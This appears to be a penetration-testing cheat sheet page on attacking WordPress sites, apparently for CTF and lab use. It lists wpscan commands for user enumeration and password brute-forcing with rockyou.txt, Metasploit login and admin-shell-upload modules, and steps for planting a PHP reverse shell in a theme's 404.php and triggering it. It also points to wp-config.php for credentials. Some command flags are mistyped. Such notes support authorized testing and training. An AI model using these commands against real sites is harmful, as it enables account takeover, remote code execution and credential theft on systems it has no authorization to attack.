Wordpress

​
Wordpress
Brute-force http://$IP/wp-admin, http://$IP/wp-login.php
# Extract users, version
wpscan --url http://$IP --enumerate
# Brute-force creds (user: admin)
wpscan --url http://$IP --wordlist rockyou.txt --username $USERS --max-threads 3
# Ignore the SSL cert errordisable-tls-check
wpscan -–url https://$IP disable-tls-check
Metasploit
brute-force: msf > use auxiliary/scanner/http/wordpress_login_enum
Check http://$IP/wp-content/themes, http://$IP/wp-content/uploads
Possible attack vectors:
After login, upload php reverse shell in 404.php of a theme (wp-content/themes/twentynineteen/404.php)
msf > use exploit/unix/webapp/wp_admin_shell_upload
Upload malicious plugins in zip
Check interesting files: /var/www/wp-config.php
Check plugins’ vulnerability
WordPress Plugin User Role Editor (https://www.exploit-db.com/exploits/44595): THM-Jack
Where uploads are stored
<base URL>/wp-content/uploads/<yyyy>/<mm>/<file name>  
 
e.g.  
http://10.10.10.10/wp-content/uploads/2018/08/logo.png
10.10.10.10
​
​
WordPress Enumeration 
wpscan --url <url> -e vt,tt,u,ap -o wpscan.log 
 
WordPress Bruteforcing 
wpscan --url <url> --wordlist <wordlist> --username <username>  
​
​
​
Navigate to: 
Appearance (left-hand side) > Editor (left-hand side) > 404 Template (right-hand side) 
 
 Spawn Shell From WP Admin Access
 
Replace the PHP there with malicious shell spawning PHP (e.g. pentestmonkey php reverse shell script) 
 
 
Browse to http://<site_name>/wp-content/themes/<theme_name>/404.php  to trigger the payload 

ColdFusion 8

Mysql commands

Last modified 8mo ago

Wordpress

​

Wordpress

Where uploads are stored

WordPress Enumeration

WordPress Bruteforcing

Spawn Shell From WP Admin Access